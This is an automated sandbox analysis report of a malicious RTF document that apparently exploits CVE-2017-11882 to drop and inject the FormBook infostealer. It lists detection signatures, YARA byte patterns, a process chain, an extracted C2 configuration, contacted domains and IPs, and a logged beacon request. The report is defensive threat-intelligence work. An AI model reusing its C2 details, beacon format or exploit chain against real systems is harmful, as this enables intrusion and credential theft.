
Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520 (renamed file extension from 1520 to rtf)
Analysis ID: 680332
MD5: 26111b2647fc8b1e3e123e825f716b94
SHA1: 131907f569a2774c1800430ccf052896dc685ec0
SHA256: 7d4a1c05f377343f063e0b265fc85f928b59f0cd88914f2b2715c4a25c734838
Tags: rtf

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Document contains OLE streams which likely are hidden ActiveX objects
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Office process drops PE file
Writes to foreign memory regions
Document contains OLE streams with names of living off the land binaries
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Found suspicious RTF objects
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Document contains Microsoft Equation 3.0 OLE entries
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Office Equation Editor has been started
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2556 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1300 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 2992 cmdline: CmD.exe /C %tmp%\Client.exe A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • Client.exe (PID: 2948 cmdline: C:\Users\user\AppData\Local\Temp\Client.exe A C MD5: D94161753531177B2FB80365ADDCBFA8)
        • notepad.exe (PID: 2496 cmdline: C:\Windows\SysWOW64\notepad.exe /Processid:{9A42BBC4-4F4B-4518-841E-56E3DAA7341B} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • NAPSTAT.EXE (PID: 204 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
              • firefox.exe (PID: 2420 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
Rule: MAL_RTF_Embedded_OLE_PE
Description: Detects a suspicious string often used in PE files in a hex encoded object stream
Author: Florian Roth
Strings:
  • 0x78b4:$a1: 546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f6465
  • 0x7818:$m1: 4d5a90000300000004000000ffff

Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1269:$obj2: \objdata
  • 0x1df799:$obj2: \objdata
  • 0x2bfdaf:$obj3: \objupdate
  • 0x8de:$obj4: \objemb
  • 0x1dee0e:$obj4: \objemb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp
Rule: rtf_cve2017_11882_ole
Description: Attempts to identify the exploit CVE 2017 11882
Author: John Davison
Strings:
  • 0xea600:$headers: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00 C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03 0A
  • 0xea621:$font: 0A 01 08 5A 5A
  • 0xea652:$winexec: 12 0C 43 00

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp
Rule: EXP_potential_CVE_2017_11882
Description: unknown
Author: ReversingLabs
Strings:
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0xea500:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0x280c:$exe: .exe
  • 0x281f:$exe: .exe
  • 0x283a:$exe: .exe
  • 0xea629:$exe: .exe
  • 0xea63d:$exe: .exe
  • 0xea652:$address: 12 0C 43 00
Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1d780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa93f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x16b67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x16965:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x16411:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x16a67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x16bdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa50a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1565c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb252:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1c3d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1d4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18e29:$sqlite3step: 68 34 1C 7B E1
  • 0x18f5c:$sqlite3step: 68 34 1C 7B E1
  • 0x18e6b:$sqlite3text: 68 38 2A 90 C5
  • 0x18fb3:$sqlite3text: 68 38 2A 90 C5
  • 0x18e82:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18fd5:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

(62 entries in the full table; the remainder are not shown)

Source: 9.2.notepad.exe.400000.1.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 9.2.notepad.exe.400000.1.raw.unpack
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1d780:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa93f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x16b67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Source: 9.2.notepad.exe.400000.1.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x16965:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x16411:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x16a67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x16bdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa50a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1565c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb252:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1c3d7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1d4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 9.2.notepad.exe.400000.1.raw.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18e29:$sqlite3step: 68 34 1C 7B E1
  • 0x18f5c:$sqlite3step: 68 34 1C 7B E1
  • 0x18e6b:$sqlite3text: 68 38 2A 90 C5
  • 0x18fb3:$sqlite3text: 68 38 2A 90 C5
  • 0x18e82:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18fd5:$sqlite3blob: 68 53 D8 7F 8C

Source: 9.0.notepad.exe.400000.2.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

(39 entries in the full table; the remainder are not shown)

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf | ReversingLabs: Detection: 14%
Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Temp\Client.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\Client.exe | Joe Sandbox ML: detected
Source: 9.0.notepad.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.notepad.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.bookmarkfiles.info/aekc/"], "decoy": ["RMXvmWv1T8LnwQ==", "Eihj8MxKqewaukr9kA==", "+g6zzMM6GRqNBkX3uOBoqQ==", "pWRxiwc2Bfok7RT5", "vPwdzH5MqglB6x8BBR1yrw==", "MjC+3B4RiO87RDzpmA==", "38QEn2bgSsIbukr9kA==", "H/gg2eB11REpukr9kA==", "nR93HiGa/mm/l+rJcb0fzd3Ys9oH32E71g==", "1tdkeMK6HwpkdW9G/kFSNwwB2TiAJg==", "oxrGgFLiVZy7cJxgKmur4bIu", "1dZdfsq5k9TlwQ+5duE=", "b0J+ndKQ9h05o6NV8lOr4bIu", "fjfP53bwT8LnwQ==", "hTvn/If7T8LnwQ==", "FDzSk+QA0/1P", "9jlCyLJev/gnukr9kA==", "hRGrJJDDvPMQTa2POpTalloPghMa", "ioI1Oi/bWM0DVVpH/GXBQtDC3A==", "7Qq8yL5gzg702uLu", "9aS3x0Ry6dY4ZZ99S5PKQtDC3A==", "yMYCrLpn10a3R1E1AFOv6ack", "w8w/bvcWATu7PDDwfd0JuYgI0A==", "NTbg7NdXVle3N1Pu0CUw", "OQQbz5yH+jOxwQ+5duE=", "qTrBdXUWf8vwGBk=", "oi21Ou1SR37/pPq9U7m6Nz8E2TiAJg==", "l9PJcHotT8LnwQ==", "K/QPqqhuzMkB7PjYiKZAb3I=", "roGw5GmYgsUk7RT5", "gTxXZNw8T8LnwQ==", "5N+VzPa9HhZ0f3pRGniEeDcs3PI=", "CeIVuGevoMbvN5Fr/GCr4bIu", "hkZ+riVUPmvvfHcYBlWl36Yl1A==", "nOfvBG59bKkwzdeNIYPFQtDC3A==", "W57fbAhOOkGdGkIAo/NP/cqJ4vQ=", "E8tuxTQzaqZB", "ugwnTscE8fYk7RT5", "JrAINpN+XL0d4hLnlek=", "qESZmsanHEjMukr9kA==", "/v06r9lmzw==", "W/CcThAzaqZB", "xML0nKZguwUN8QY=", "5XIhrh0dlLk/oBZibInIQtDC3A==", "Z3C7ZmwGA/ok7RT5", "DRi50wcM+2wQsQLoicXEOQGAKNP232E71g==", "AF+XxB0kk4HhnuLXn/My8Ho=", "HGucKuFQc/pymOzcmA==", "voOmzEFjVr0JRm5E+l2r4bIu", "ddDg/GlYzfQZ5iHve6ZAb3I=", "XBxNffL72iGfJX1tbaKguA==", "MxhV44jVxD+PGPbYmA==", "0WeywuzZvww2iA/WfPY=", "1myvw0eaf6gklfODaZ4sYmw=", "SOOWE3prlNJZ", "MTC9xPPkUjxsT0kf1DN/SAx8OvRxRA6h", "0JyrUE8FaI8iJxvXdqZAb3I=", "Hd4mSndaPXTmig/WfPY=", "11PeMCuzsqHVJ0nu0CUw", "0iQvcErbTcQcukr9kA==", "LH+NhcKpDC1XGHbu0CUw", "gThzlciV/PsyEVPxn/Q67no=", "lIgXFAarBzy5uA+5duE=", "31gOPnVkSwUN8QY="]}

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe
Source: Static RTF information: Object: 1 Offset: 001DF7BDh
Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.dr | Stream path '_1721465588/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: notepad.pdb source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1042200687.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.945235876.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.946852409.0000000000970000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: notepad.pdbx source: NAPSTAT.EXE, 0000000B.00000002.1177850032.0000000000433000.00000004.00000020.00020000.00000000.sdmp, NAPSTAT.EXE, 0000000B.00000002.1180581876.0000000002303000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000D.00000000.1154674128.0000000000593000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: napstat.pdb source: notepad.exe, 00000009.00000003.1038035602.000000000088C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1039905006.00000000002E0000.00000040.10000000.00040000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: Client.exe.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Client.exe
Source: global traffic | DNS query: name: www.magadirect.co.uk
Source: global traffic | DNS query: name: www.sqlite.org
Source: global traffic | DNS query: name: www.luanaterra.online
Source: global traffic | DNS query: name: www.hogogala.com
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 45.33.18.44:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80
Source: global traffic | TCP traffic: 45.33.6.223:80 -> 192.168.2.22:49172
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.33.18.44:80
Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 45.33.6.223:80

Networking

Source: C:\Windows\explorer.exe | Domain query: www.magadirect.co.uk
Source: C:\Windows\explorer.exe | Network Connect: 45.33.18.44 80
Source: Malware configuration extractor | URLs: www.bookmarkfiles.info/aekc/
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: global traffic | HTTP traffic detected: GET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1 | Host: www.magadirect.co.uk | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 45.33.18.44 45.33.18.44
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | server: openresty/1.13.6.1 | date: Mon, 08 Aug 2022 10:08:49 GMT | content-type: text/html | content-length: 175 | connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | Date: Mon, 08 Aug 2022 10:09:09 GMT | Content-type: text/html; charset=utf-8 | Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 39 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 31 34 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 30 38 30 37 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 0a | Data Ascii: <head><title lineno="390">Not Found</title></head><body><h1>Document Not Found</h1>The document /2014/sqlite-dll-win32-x86-3080700.zip is not available on this server</body>
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Client.exe, 00000005.00000002.947458698.0000000002671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000000.1008328661.0000000006450000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
